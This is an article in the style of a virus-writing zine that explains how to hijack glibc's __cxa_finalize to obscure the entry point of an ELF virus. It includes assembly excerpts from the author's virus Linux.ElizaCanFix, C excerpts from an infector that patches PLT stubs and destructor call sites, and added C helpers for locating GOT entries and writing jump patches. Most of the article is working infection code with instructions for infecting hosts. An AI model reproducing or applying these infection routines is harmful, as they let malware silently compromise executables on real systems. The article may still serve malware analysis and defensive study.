Hijacking __cxa_finalize to achieve entry point obscuring

                                                      ┌───────────────────────┐
                                                      ▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄       │
                                                      │ █   █ █ █ █   █       │
                                                      │ █   █ █ █ █▀▀▀▀       │
                                                      │ █   █   █ █     ▄     │
                                                      │                 ▄▄▄▄▄ │
                                                      │                 █   █ │
                                                      │                 █   █ │
                                                      │                 █▄▄▄█ │
                                                      │                 ▄   ▄ │
                                                      │                 █   █ │
                                                      │                 █   █ │
                                                      │                 █▄▄▄█ │
                                                      │                 ▄▄▄▄▄ │
Hijacking __cxa_finalize to achieve                   │                   █   │
entry point obscuring                                 │                   █   │
~ vrzh                                                └───────────────────█ ──┘

Hijacking the destruction mechanism is an effective entry point obscuring (EPO)
virus technique, so long as the delayed execution doesn't impede functionality
of the virus or the host. A common example of this technique is patching the
destructor array. In the first tmp.out issue [0], s01den and sblip
published their Linux.Eng3ls virus, which used this EPO technique. The virus
also uses a number of other cool techniques and I strongly recommend you check
it out, as well as s01den's follow-up note on EPO techniques in tmp.out #2 [1].
The C++ ABI spec exposes another, less obvious target for hijacking code
execution - __cxa_finalize(). In this txt I'm going to describe the purpose of
__cxa_finalize(), touch on how it fits in the ELF destruction process, and
present two methods of hijacking it.

Two pieces of my code supplement this txt:
  ▪ A virus Linux.ElizaCanFix, which implements Method 0.
  ▪ An infector [2] written in C, which implements both hijacking methods.

Both programs use Silvio Cesare's text segment padding infection [3], but any
other infection method can be used. Detailing the infection method is out of
the scope of this txt.
 ╓                           ╖
═╣ What is __cxa_finalize()? ╠═════════════════════════════════════════════════
 ╙                           ╜
The purpose of the __cxa_finalize() function is to run C++ object destructors.
It's defined as a part of the Itanium C++ ABI specification [4], more precisely
the Dynamic Shared Object (DSO) destruction at runtime. According to the spec,
the DSO object destruction API consists of two components:

▪ __cxa_atexit()

┌─┤ glibc ├─────────────────────────────────────────┤ stdlib/cxa_atexit.c ├───┐
│                                                                             │
│ int __cxa_atexit (void (*func) (void *), void *arg, void *d)                │
└─────────────────────────────────────────────────────────────────────────────┘
  __cxa_atexit() registers a destructor routine func with an argument arg for a
  DSO handle d. A DSO handle is an address in one of the DSO's segments. It can
  be any address as long as it is unique per-DSO. The linker exposes this
  handle via a hidden symbol __dso_handle.

▪ __cxa_finalize()

┌─┤ glibc ├───────────────────────────────────────┤ stdlib/cxa_finalize.c ├───┐
│                                                                             │
│ void __cxa_finalize (void *d)                                               │
└─────────────────────────────────────────────────────────────────────────────┘
  __cxa_finalize() calls all destructors for the DSO represented by the handle
  d in a manner that conforms to the C++ standard (i.e. destructors are called
  in the order opposite to their registration).

Despite it appearing in a C++ specification, this mechanism is expected to be
implemented for code written in C as well, since C-only Dynamic Shared Objects
still have to interact with C++ programs in a spec-conforming manner. The spec
also notes that these functions are not to be exposed to the programmer
directly. In GNU libc atexit(3) is simply a wrapper around __cxa_atexit(),
although the only argument exposed to the caller is the function pointer to the
destructor.
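
To make the API a bit more tangible, here is a minimal sketch of mine (not
taken from glibc or the spec) that registers two destructors against a made-up
DSO handle and then fires them by calling __cxa_finalize() by hand. It assumes
glibc, which exports both symbols without declaring them in a public header.
The handle fake_dso and the names record() and run_demo() are hypothetical, and
regular programs have no business calling these functions like this.

```c
#include <assert.h>
#include <stddef.h>

/* Exported by glibc, but not declared in any public header. */
extern int  __cxa_atexit(void (*func)(void *), void *arg, void *d);
extern void __cxa_finalize(void *d);

/* Hypothetical stand-in for __dso_handle: any address unique to "our DSO". */
static char fake_dso;

static int order[2];
static size_t ncalls;

/* Destructor: remembers the order in which it was invoked. */
static void record(void *arg)
{
    assert(ncalls < 2);
    order[ncalls++] = *(int *)arg;
}

/* Registers two destructors, then runs them through __cxa_finalize(). */
int run_demo(void)
{
    static int first = 1, second = 2;

    if (__cxa_atexit(record, &first, &fake_dso) != 0 ||
        __cxa_atexit(record, &second, &fake_dso) != 0)
        return -1;

    /* Only entries registered with &fake_dso are executed here. */
    __cxa_finalize(&fake_dso);
    return 0;
}
```

After run_demo() returns, order[] should hold the arguments in reverse
registration order, and the two entries are marked as consumed, so they don't
run a second time at exit.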

The Itanium C++ ABI is a widely accepted specification and one is likely to
find this mechanism in dynamically linked binaries compiled with common
toolchains such as gcc and clang. GNU libc, for example, implemented it in the
late 90's. Throughout this txt I will be using glibc as the reference libc
implementation.
 ╓                      ╖
═╣ Beginning of the end ╠══════════════════════════════════════════════════════
 ╙                      ╜
The return value of the main() function is passed to exit(), which in turn is
a wrapper around __run_exit_handlers():

┌─┤ glibc ├──────────────────────┤ sysdeps/generic/libc_start_call_main.h ├───┐
│                                                                             │
│   _Noreturn static __always_inline void                                     │
│   __libc_start_call_main (int (*main) (int, char **,                        │
│                                        char ** MAIN_AUXVEC_DECL),           │
│                           int argc,                                         │
│                           char **argv MAIN_AUXVEC_DECL)                     │
│   {                                                                         │
│   exit (main (argc, argv, __environ MAIN_AUXVEC_PARAM));                    │
│   }                                                                         │
├─────────────────────────────────────────────────────────┤ stdlib/exit.c ├───┤
│ void                                                                        │
│ exit (int status)                                                           │
│ {                                                                           │
│   __run_exit_handlers (status, &__exit_funcs, true, true);                  │
│ }                                                                           │
│ ...                                                                         │
│ void                                                                        │
│ attribute_hidden                                                            │
│ __run_exit_handlers (int status, struct exit_function_list **listp,         │
│              bool run_list_atexit, bool run_dtors)                          │
│ {                                                                           │
│ ...                                                                         │
│       case ef_cxa:                                                          │
│         /* To avoid dlclose/exit race calling cxafct twice (BZ 22180),      │
│        we must mark this function as ef_free.  */                           │
│         f->flavor = ef_free;                                                │
│         cxafct = f->func.cxa.fn;                                            │
│         arg = f->func.cxa.arg;                                              │
│         PTR_DEMANGLE (cxafct);                                              │
│                                                                             │
│         /* Unlock the list while we call a foreign function.  */            │
│         __libc_lock_unlock (__exit_funcs_lock);                             │
│         cxafct (arg, status);                                               │
│         __libc_lock_lock (__exit_funcs_lock);                               │
│         break;                                                              │
│ ...                                                                         │
└─────────────────────────────────────────────────────────────────────────────┘
A function registered with __cxa_atexit() is added to the __exit_funcs list of
destructors (struct exit_function_list). In the above code excerpt you can see
that it is the same list that is passed to __run_exit_handlers() in exit().
__run_exit_handlers() will cycle through the list, executing destructors
according to their flavor. The flavor is used to distinguish how the destructor
must be executed, specifically the destructor's prototype and in some cases
additional cleanup code. Functions registered with __cxa_atexit() have the
ef_cxa flavor and in the above snippet you can see how that case is handled.

So wait... if those destructors are called in __run_exit_handlers(), when does
__cxa_finalize() get called?!

The System V ABI [5] states that at the entry point the rdx register contains a
function pointer that the program should register with atexit. In the case of a
dynamically linked executable, that function is expected to be the program
interpreter's destructor. Indeed we can see its registration in libc's init
code:

┌─┤ glibc ├────────────────────────────────────────────┤ csu/libc-start.c ├───┐
│                                                                             │
│   /* Register the destructor of the dynamic linker if there is any.  */     │
│   if (__glibc_likely (rtld_fini != NULL))                                   │
│       __cxa_atexit ((void (*) (void *)) rtld_fini, NULL, NULL);             │
└─────────────────────────────────────────────────────────────────────────────┘
In glibc's dynamic linker, the destructor is _dl_fini() - here it is passed to
the loaded binary:

┌─┤ glibc ├─────────────────────────────────┤ sysdeps/x86_64/dl-machine.h ├───┐
│                                                                             │
│     # Pass our finalizer function to the user in %rdx, as per ELF ABI.\n\   │
│     leaq _dl_fini(%rip), %rdx\n\                                            │
├─────────────────────────────────────────────────────────┤ elf/dl-fini.c ├───┤
│ void                                                                        │
│ _dl_fini (void)                                                             │
│ {                                                                           │
│   /* Lots of fun ahead.  ...                                                │
└─────────────────────────────────────────────────────────────────────────────┘
To keep it short (trust me you don't want to know what a libc developer thinks
is fun) I will note that the linker's destructor has many responsibilities, one
of which is to call destructors in the fini_array if that mechanism is used
(which is true for most modern ELFs). The first entry in this array is normally
a pointer to destructor code inserted by the compiler. Here are some examples
of such code:

┌─┤ gcc ├─────────────────────────────────────────────┤ libgcc/crtstuff.c ├───┐
│                                                                             │
│   static void __attribute__((used))                                         │
│   __do_global_dtors_aux (void)                                              │
│   {                                                                         │
│     ...                                                                     │
│     if (__cxa_finalize)                                                     │
│       __cxa_finalize (__dso_handle);                                        │
│                                                                             │
├─┤ llvm ├───────────────────────────────┤ compiler-rt/lib/crt/crtbegin.c ├───┤
│                                                                             │
│   static void __attribute__((used)) __do_fini(void) {                       │
│     ...                                                                     │
│                                                                             │
│     if (__cxa_finalize)                                                     │
│       __cxa_finalize (__dso_handle);                                        │
│                                                                             │
└─────────────────────────────────────────────────────────────────────────────┘
We have arrived! If the __cxa_finalize() function is provided, it will be
executed by the compiler's destructor code. It's at this point that we are most
likely to hijack this function.
 ╓                      ╖
═╣ Payload Requirements ╠══════════════════════════════════════════════════════
 ╙                      ╜
This technique mandates a common-sense payload requirement - every register
the host still depends on must be preserved. That means the non-volatile
(callee-saved) registers, plus any argument registers that are live at the
hijack point. The payload will hand the execution back to the host and if we
clobber one of them (for example the sole argument to __cxa_finalize() in rdi)
we are likely to core.
 ╓                            ╖
═╣ Method 0: Hijacking at PLT ╠════════════════════════════════════════════════
 ╙                            ╜
The primary method of hijacking __cxa_finalize() is to find and patch its PLT
stub with a jmp to the first parasite instruction. The parasite should end with
a jmp to __cxa_finalize() through its GOT entry. To achieve this, we first have
to determine the offset of the __cxa_finalize() GOT entry, then scan the PLT
for the right stub.
   ╭                    ╮
───┤ A note on .plt.got ├──────────────────────────────────────────────────────
   ╰                    ╯
When a stub in .plt is called for the first time, the dynamic linker is invoked
to resolve the absolute address of the target function and store it in the GOT
for subsequent calls. A stub in .plt.got, on the other hand, expects the GOT to
already contain the absolute address of the function. Due to this, the .plt.got
stubs are only 8 bytes long, as opposed to the 16-byte .plt stubs. Effectively,
.plt.got stubs are padded jmp instructions:
┌─────────────────────────────────────────────────────────────────────────────┐
│ Disassembly of section .plt:                                                │
│                                                                             │
│   4090:       ff 25 9a ff 01 00       jmp    QWORD PTR [rip+0x1ff9a]        │
│   4096:       68 06 00 00 00          push   0x6                            │
│   409b:       e9 80 ff ff ff          jmp    4020                           │
│                                                                             │
│   40a0:       ff 25 92 ff 01 00       jmp    QWORD PTR [rip+0x1ff92]        │
│   40a6:       68 07 00 00 00          push   0x7                            │
│   40ab:       e9 70 ff ff ff          jmp    4020                           │
│                                                                             │
│ Disassembly of section .plt.got:                                            │
│                                                                             │
│   4640:       ff 25 52 f9 01 00       jmp    QWORD PTR [rip+0x1f952]        │
│   4646:       66 90                   xchg   ax,ax                          │
│                                                                             │
│   4648:       ff 25 62 f9 01 00       jmp    QWORD PTR [rip+0x1f962]        │
│   464e:       66 90                   xchg   ax,ax                          │
└─────────────────────────────────────────────────────────────────────────────┘
The stub for __cxa_finalize() is normally found in the .plt.got section. I
suspect this is because __cxa_finalize() doesn't benefit from the lazy linking
optimization - there isn't a case when it would be linked and not used.
   ╭                                         ╮
───┤ Finding the __cxa_finalize() GOT offset ├─────────────────────────────────
   ╰                                         ╯
The offset of the __cxa_finalize() GOT entry is found in a corresponding
relocation structure in the .rela.dyn table. To find it we must walk the host's
.rela.dyn, looking for the entry with a symbol __cxa_finalize. Again, here
we differ from a regular PLT hijack, for which we'd be walking the .rela.plt
table.

┌─┤ Linux.ElizaCanFix.asm ├───────────────────────────────────────────────────┐
│                                                                             │
│ rela_dyn:                                                                   │
│     .loop:                                                                  │
│         mov rcx, [rsp] ; rela iterator                                      │
│         cmp rcx, QWORD [r14 + host_data.rela_dyn_size]                      │
│         jl .check_entry                                                     │
│         ; we couldn't find the rela_dyn entry                               │
│         add rsp, 8                                                          │
│         jmp fail_infect                                                     │
│                                                                             │
│     .check_entry:                                                           │
│         lea r9, [rbp + rcx] ; current .rela.dyn entry                       │
│         mov rbx, QWORD [r9 + elf64_rela.r_info]                             │
│         shr rbx, 32         ; Get the .dynsym table index                   │
│                                                                             │
│         ; calculate the .dynsym table offset                                │
│         mov rcx, rbx                                                        │
│         shl rcx, 4                                                          │
│         shl rbx, 3                                                          │
│         add rbx, rcx                                                        │
│                                                                             │
│         lea rbx, [r8 + rbx]     ; .dynsym entry                             │
│         mov ebx, DWORD [rbx + elf64_sym.st_name]                            │
│         mov rdi, [r14 + host_data.dyn_str]                                  │
│         lea rdi, [rdi + rbx]    ; symbol string offset in .dynstr           │
│         ; compare with "__cxa_finalize" string                              │
│         mov rdx, cxa_fin_str_len                                            │
│         lea rsi, [rel cxa_fin_str]                                          │
│         lea r15, [rel _memcmp]                                              │
│         call r15                                                            │
│         test rdi, rdi                                                       │
│         jnz .continue                                                       │
│         ; we found the __cxa_finalize relocation data                       │
│         mov r9, [r9 + elf64_rela.r_offset]                                  │
│         lea r9, [rax + r9]      ; __cxa_finalize GOT offset                 │
│         mov [r14 + host_data.cxa_finalize_offt], r9                         │
│         jmp .done                                                           │
└─────────────────────────────────────────────────────────────────────────────┘
The relocation type should be R_X86_64_GLOB_DAT, which simply indicates that
the r_offset field of the relocation entry points directly to the GOT entry.
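
For readers who'd rather not squint at the assembly, the same walk can be
sketched in C with the <elf.h> types. This is my own illustration, not code
from the virus or the infector: find_glob_dat() is a hypothetical helper, the
three tables are assumed to be already located by the caller, and unlike the
assembly it also filters on the relocation type. As a side note, the shl 4 /
shl 3 / add sequence in the virus multiplies the symbol index by 24, which is
sizeof(Elf64_Sym).

```c
#include <assert.h>
#include <elf.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/*
 * Returns the r_offset of the R_X86_64_GLOB_DAT relocation that refers to
 * `name`, or 0 if there is none. rela/dynsym/dynstr point at the host's
 * .rela.dyn, .dynsym and .dynstr contents respectively.
 */
uint64_t find_glob_dat(const Elf64_Rela *rela, size_t nrela,
                       const Elf64_Sym *dynsym, const char *dynstr,
                       const char *name)
{
    assert(rela && dynsym && dynstr && name);

    for (size_t i = 0; i < nrela; i++) {
        if (ELF64_R_TYPE(rela[i].r_info) != R_X86_64_GLOB_DAT)
            continue;

        /* The upper 32 bits of r_info index into .dynsym. */
        const Elf64_Sym *sym = &dynsym[ELF64_R_SYM(rela[i].r_info)];

        /* st_name is a byte offset into .dynstr. */
        if (strcmp(dynstr + sym->st_name, name) == 0)
            return rela[i].r_offset;
    }
    return 0;
}
```

A call like find_glob_dat(rela, n, dynsym, dynstr, "__cxa_finalize") would
then yield the virtual address of the GOT slot we are after.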
   ╭                                               ╮
───┤ Finding the __cxa_finalize() stub in .plt.got ├───────────────────────────
   ╰                                               ╯
To find the correct stub, we scan the .plt.got section and check the operand of
each jmp instruction. If the operand + address after the jmp equals the GOT
entry address we found in the previous step - we've found the __cxa_finalize()
stub.

┌─┤ Linux.ElizaCanFix.asm ├───────────────────────────────────────────────────┐
│                                                                             │
│ plt_got:                                                                    │
│     .loop:                                                                  │
│         mov ebx, DWORD [rdx + rcx + 2]  ; jmp operand                       │
│         lea r8, [rdx + rcx + 6]         ; address after the jmp             │
│         add rbx, r8                     ; test offset                       │
│         cmp rbx, QWORD [r14 + host_data.cxa_finalize_offt]                  │
│         jne .next                                                           │
│         lea rbx, [rdx + rcx]                                                │
│         mov [r14 + host_data.addrof_pltgot_stub], rbx                       │
│         jmp .done                                                           │
│                                                                             │
│     .next:                                                                  │
│         add rcx, 8 ; size of a .plt.got stub                                │
│         cmp rcx, [r14 + host_data.plt_got_len]                              │
│         jl .loop                                                            │
└─────────────────────────────────────────────────────────────────────────────┘
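
The same scan, sketched in C. Again this is only an illustration under my own
assumptions: find_pltgot_stub() is a hypothetical helper, the section bytes and
its virtual address are supplied by the caller, and the host is little-endian.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define PLTGOT_STUB_SIZE 8

/*
 * Scans `len` bytes of .plt.got, loaded at virtual address `sec_addr`, for
 * the stub whose jmp goes through the GOT slot at `got_addr`.
 * Returns the stub's byte offset within the section, or -1.
 */
long find_pltgot_stub(const uint8_t *sec, size_t len,
                      uint64_t sec_addr, uint64_t got_addr)
{
    assert(sec != NULL);

    for (size_t off = 0; off + PLTGOT_STUB_SIZE <= len;
         off += PLTGOT_STUB_SIZE) {
        int32_t disp;

        if (sec[off] != 0xff || sec[off + 1] != 0x25)
            continue;               /* not jmp QWORD PTR [rip+disp32] */

        memcpy(&disp, &sec[off + 2], sizeof disp);

        /* rip-relative: slot = address after the 6-byte jmp + disp32 */
        if (sec_addr + off + 6 + (int64_t)disp == got_addr)
            return (long)off;
    }
    return -1;
}
```

Fed with the two .plt.got stubs from the disassembly above (section at 0x4640),
the first stub resolves to the GOT slot at 0x4646 + 0x1f952 = 0x23f98 and the
second one to 0x464e + 0x1f962 = 0x23fb0.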
Now we must calculate the offset to the virus and patch this jmp instruction.
Note that in Linux.ElizaCanFix we're jumping within the same segment, so the
patch uses a near relative jmp (e9 rel32). The same encoding reaches any
target within 2 GiB of the stub, other ELF segments included. Only a parasite
placed farther away would need an indirect jmp instead.

┌─┤ Linux.ElizaCanFix.asm ├───────────────────────────────────────────────────┐
│                                                                             │
│   ; patch the .plt.got stub with a jmp to parasite                          │
│   mov rbx, [r14 + host_data.addrof_pltgot_stub]                             │
│   mov BYTE [rbx], 0xe9    ; near jmp opcode                                 │
│   mov rdi, [rsp + 16]     ; end of the code segment                         │
│   lea rsi, [rbx + 5]      ; address after near jmp instruction              │
│   sub rdi, rsi            ; jmp offset to parasite                          │
│   mov DWORD [rbx + 1], edi                                                  │
└─────────────────────────────────────────────────────────────────────────────┘
Finally, we calculate the offset from the end of the infection to the
__cxa_finalize() GOT entry and add it as the jmp operand in the virus epilogue.

┌─┤ Linux.ElizaCanFix.asm ├───────────────────────────────────────────────────┐
│                                                                             │
│   ; set up the jump after the virus                                         │
│   add rdi, rdx                ; end of the virus                            │
│   mov WORD [rdi], 0x25ff      ; jmp QWORD PTR [rip + ?]                     │
│   mov rsi, [r14 + host_data.cxa_finalize_offt]                              │
│   lea rdx, [rdi + 6]          ; address after the jmp                       │
│   sub rsi, rdx                ; new jmp offset to __cxa_finalize            │
│   mov DWORD [rdi + 2], esi                                                  │
└─────────────────────────────────────────────────────────────────────────────┘
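
Both patches boil down to the same arithmetic: the operand is the distance from
the end of the instruction to the target. Here is a small C sketch of the two
encodings. The helper names emit_jmp_rel32() and emit_jmp_via_got() are made up
for this illustration, all addresses are virtual addresses picked by the
caller, and a little-endian host is assumed.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Writes `e9 rel32` (5 bytes) at buf; `at` is the address of buf[0]. */
void emit_jmp_rel32(uint8_t *buf, uint64_t at, uint64_t target)
{
    int64_t rel = (int64_t)(target - (at + 5));

    assert(rel >= INT32_MIN && rel <= INT32_MAX);
    int32_t rel32 = (int32_t)rel;

    buf[0] = 0xe9;
    memcpy(&buf[1], &rel32, sizeof rel32);
}

/* Writes `ff 25 disp32` (jmp QWORD PTR [rip+disp32], 6 bytes) at buf. */
void emit_jmp_via_got(uint8_t *buf, uint64_t at, uint64_t got_slot)
{
    int64_t disp = (int64_t)(got_slot - (at + 6));

    assert(disp >= INT32_MIN && disp <= INT32_MAX);
    int32_t disp32 = (int32_t)disp;

    buf[0] = 0xff;
    buf[1] = 0x25;
    memcpy(&buf[2], &disp32, sizeof disp32);
}
```

For example, with a stub at 0x4640 and a parasite at a made-up address 0x5000,
the stub patch is e9 bb 09 00 00. An epilogue sitting at 0x5100 and jumping
through a GOT slot at 0x23f98 comes out as ff 25 92 ee 01 00.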
This should be it - presuming you've found a place for your virus, the host
should now be infected.
 ╓                                             ╖
═╣ Method 1: Hijacking calls in the destructor ╠═══════════════════════════════
 ╙                                             ╜
Some Linux distributions, such as Arch (I use Arch btw), choose to build
binaries with a no-plt optimization. The rationale behind this decision is
optimizing for space - with a lot of imports the PLT can really blow up.
For those cases, Method 0 obviously won't work. I didn't want to give up on
those binaries though and came up with an alternative method. It's a bit wonky,
but gets the job done.

Recall that in both gcc and clang, the default destructor first checks whether
__cxa_finalize() is NULL before calling it. This check takes place because the
compiler doesn't know whether __cxa_finalize() will be exported by libc or
another method will be used to run the destructors. This leaves a predictable
pattern in the default destructor, which will allow us to find the hijacking
point. The strategy is to scan for a QWORD PTR cmp (48 83 3d), followed a few
instructions later by a QWORD PTR call (ff 15), both of which must have the
same operand (the other cmp operand is 0). We can then use the call operand to
calculate the GOT offset of __cxa_finalize(), patch the call to instead call
the virus body, and finally just like in the previous method, simply jmp to
the address in the __cxa_finalize() GOT entry.

First though, we need to find the default destructor. As mentioned previously,
it is normally the first entry in the fini_array so we get the .fini_array
section offset, grab the first pointer, and calculate the file offset:

┌─┤ infect_cxa_finalize.c ├───────────────────────────────────────────────────┐
│                                                                             │
│ static int get_host_sections(struct parasite_host *host)                    │
│ {                                                                           │
│     ...                                                                     │
│     Elf64_Half i;                                                           │
│     uint32_t *fini_array;                                                   │
│     ...                                                                     │
│     for (i = 0; i < host->elf->e_shnum; i++) {                              │
│         switch (host->shdrs[i].sh_type) {                                   │
│     ...                                                                     │
│         case SHT_FINI_ARRAY:                                                │
│         fini_array = (uint32_t *)((uint64_t)host->elf +                     │
│                                   (uint64_t)host->shdrs[i].sh_offset);      │
│         if (fini_array && fini_array[0]) {                                  │
│             host->do_glob_dtors = (uint8_t *)((uint64_t)host->elf +         │
│                                              (uint64_t)fini_array[0]);      │
│         }                                                                   │
│         break;                                                              │
│     ...                                                                     │
└─────────────────────────────────────────────────────────────────────────────┘
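
Note that the excerpt adds the fini_array value straight to the mapped file
base, which only works when the virtual address and the file offset of the
destructor coincide. That tends to hold for the text segment of the binaries I
tested against, but it is not guaranteed. A more general translation through
the PT_LOAD program headers could look like the sketch below. The helper
vaddr_to_offset() is hypothetical and not part of the infector.

```c
#include <assert.h>
#include <elf.h>
#include <stddef.h>
#include <stdint.h>

/*
 * Translates a virtual address to a file offset using the PT_LOAD program
 * headers. Returns UINT64_MAX if no loadable segment backs the address
 * with file contents.
 */
uint64_t vaddr_to_offset(const Elf64_Phdr *phdrs, size_t phnum,
                         uint64_t vaddr)
{
    assert(phdrs != NULL);

    for (size_t i = 0; i < phnum; i++) {
        const Elf64_Phdr *p = &phdrs[i];

        if (p->p_type != PT_LOAD)
            continue;

        /* p_filesz, not p_memsz: .bss-like tails have no file bytes. */
        if (vaddr >= p->p_vaddr && vaddr - p->p_vaddr < p->p_filesz)
            return p->p_offset + (vaddr - p->p_vaddr);
    }
    return UINT64_MAX;
}
```

The result can then be added to the mapped file base in place of the raw
fini_array value.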
Now it's time to scan it. This method of scanning will work in a pinch, but
it's only a PoC. A stray c3 byte (ret) will cause an early loop termination.

┌─┤ infect_cxa_finalize.c ├───────────────────────────────────────────────────┐
│                                                                             │
│ #define RET 0xc3                                                            │
│ const uint8_t qwordcmp[] = { 0x48, 0x83, 0x3d };                            │
│ const uint8_t qwordcall[] = { 0xff, 0x15 };                                 │
│    ...                                                                      │
│    for (i=0; host->do_glob_dtors[i+8] != RET; i++) {                        │
│        if (!memcmp(&host->do_glob_dtors[i], qwordcmp, 3)) {                 │
│            saved_offt = *(uint32_t *)&host->do_glob_dtors[i+3];             │
│            cxafin_got = &host->do_glob_dtors[i+8] + saved_offt;             │
│            DBG("[DEBUG][CMP] __cxa_finalize\t@%p\n", cxafin_got);           │
│        }                                                                    │
│                                                                             │
│        if (!memcmp(&host->do_glob_dtors[i], qwordcall, 2)) {                │
│            saved_offt = *(uint32_t *)&host->do_glob_dtors[i+2];             │
│            if (cxafin_got == &host->do_glob_dtors[i+6] + saved_offt) {      │
│                DBG("[DEBUG] Found __cxa_finalize\t@%p\n", cxafin_got);      │
│                memcpy(&dtors_epilogue[DTORS_EPILOGUE_JMPOFFT],              │
│                       &host->do_glob_dtors[i], 6);                          │
│                host->hijack_site = &host->do_glob_dtors[i];                 │
│                return 0;                                                    │
│            }                                                                │
│        }                                                                    │
│    }                                                                        │
└─────────────────────────────────────────────────────────────────────────────┘
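
If the stray c3 problem bothers you, one option is to bound the scan by a
length instead of a ret sentinel. The sketch below is a hypothetical variant,
not what the infector does: find_guarded_call() and its len parameter are my
own names, the caller has to come up with a sensible upper bound for the
destructor's size, and a little-endian host is assumed. All offsets are
relative to the first byte of the scanned code.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

static int32_t rd32(const uint8_t *p)
{
    int32_t v;

    memcpy(&v, p, sizeof v);
    return v;
}

/*
 * Looks for `cmp QWORD PTR [rip+X], imm8` followed later by
 * `call QWORD PTR [rip+Y]` where both operands resolve to the same slot.
 * Returns the byte offset of the call and stores the slot's offset in
 * *slot, or returns -1 if nothing matches within `len` bytes.
 */
long find_guarded_call(const uint8_t *code, size_t len, int64_t *slot)
{
    static const uint8_t cmp_op[]  = { 0x48, 0x83, 0x3d };
    static const uint8_t call_op[] = { 0xff, 0x15 };
    int have_cmp = 0;
    int64_t cmp_target = 0;

    assert(code && slot);

    for (size_t i = 0; i < len; i++) {
        /* cmp is 8 bytes: 3 opcode/modrm + 4 disp32 + 1 imm8 */
        if (i + 8 <= len && !memcmp(&code[i], cmp_op, 3)) {
            cmp_target = (int64_t)i + 8 + rd32(&code[i + 3]);
            have_cmp = 1;
        }
        /* call is 6 bytes: 2 opcode/modrm + 4 disp32 */
        if (have_cmp && i + 6 <= len && !memcmp(&code[i], call_op, 2) &&
            (int64_t)i + 6 + rd32(&code[i + 2]) == cmp_target) {
            *slot = cmp_target;
            return (long)i;
        }
    }
    return -1;
}
```

Since it still matches raw bytes rather than decoded instructions, false
positives inside operands remain possible. The operand equality check is what
keeps them unlikely.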
At this point we have all we need to finish the hijack. We patch the call site
with a call to our virus..

┌─┤ infect_cxa_finalize.c ├───────────────────────────────────────────────────┐
│                                                                             │
│ uint8_t call[6] = {                                                         │
│   0xe8, 0x00, 0x00, 0x00, 0x00, // call ?                                   │
│   0x90                          // nop                                      │
│ };                                                                          │
│                                                                             │
│ uint32_t *call_operand = (uint32_t *)&call[1];                              │
│ ...                                                                         │
│     *call_operand = virus_offt;                                             │
│     memcpy(host->hijack_site, call, 6);                                     │
│ ...                                                                         │
└─────────────────────────────────────────────────────────────────────────────┘
.. and set the address of the __cxa_finalize() GOT entry as the jmp operand in
the virus epilogue. The calculation for this jmp is exactly the same as in the
previous method.

Some of you might notice that we are replacing an indirect call (ff 15) with a
relative call (e8) - instructions that differ in length (6 vs 5 bytes). The
purpose of the additional nop (90) instruction in the call[] array is to pad
the patch to the original length, so that it lines up with the surrounding
destructor code and __cxa_finalize() returns to a valid instruction. The
padding is not needed if your patch is already 6 bytes long.
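
The operand calculation elided from the excerpt above can be sketched like
this. patch_call_site() is a hypothetical helper of mine, both addresses are
virtual addresses supplied by the caller, and a little-endian host is assumed.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/*
 * Overwrites a 6-byte `call QWORD PTR [rip+disp32]` at `site` with
 * `call rel32` followed by a nop. Returns the address that the call
 * pushes as its return address.
 */
uint64_t patch_call_site(uint8_t *site, uint64_t site_addr, uint64_t target)
{
    int64_t rel = (int64_t)(target - (site_addr + 5));

    assert(rel >= INT32_MIN && rel <= INT32_MAX);
    int32_t rel32 = (int32_t)rel;

    site[0] = 0xe8;                         /* call rel32 */
    memcpy(&site[1], &rel32, sizeof rel32);
    site[5] = 0x90;                         /* nop fills the 6th byte */

    return site_addr + 5;                   /* i.e. the nop itself */
}
```

The return address lands on the nop, so once __cxa_finalize() returns, the
destructor falls through into the instruction that originally followed the
call.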

This method isn't strictly limited to hijacking __cxa_finalize() - it can be
adapted to hijack any call that can be found and reached with a predictable
code pattern.
 ╓               ╖
═╣ Disadvantages ╠═════════════════════════════════════════════════════════════
 ╙               ╜
▪ This hijacking method is only applicable to dynamically linked executables.

▪ If the binary can circumvent the destruction mechanism (e.g. through an
  exit syscall or calls to quick_exit()/_Exit()) the virus will not be reached.

▪ __cxa_finalize() might be called more than once per-execution, so if you take
  the PLT hijacking route (Method 0) your parasite may be called again.
 ╓            ╖
═╣ References ╠════════════════════════════════════════════════════════════════
 ╙            ╜
[0] Lin64.Eng3ls: Some anti-RE techniques in a Linux virus [https://tmpout.sh/1/7.html]
[1] A short note on entrypoint obscuring in ELF binaries [https://tmpout.sh/2/2.html]
[2] [https://github.com/v-rzh/cxa-finalize-infect.git]
[3] [https://web.archive.org/web/20210420163849/https://ivanlef0u.fr/repo/madchat/vxdevl/vdat/tuunix01.htm#11]
[4] Itanium C++ ABI. [https://itanium-cxx-abi.github.io/cxx-abi/]
[5] System V Application Binary Interface AMD64 Architecture Processor Supplement (29-30) [https://refspecs.linuxbase.org/elf/x86_64-abi-0.99.pdf]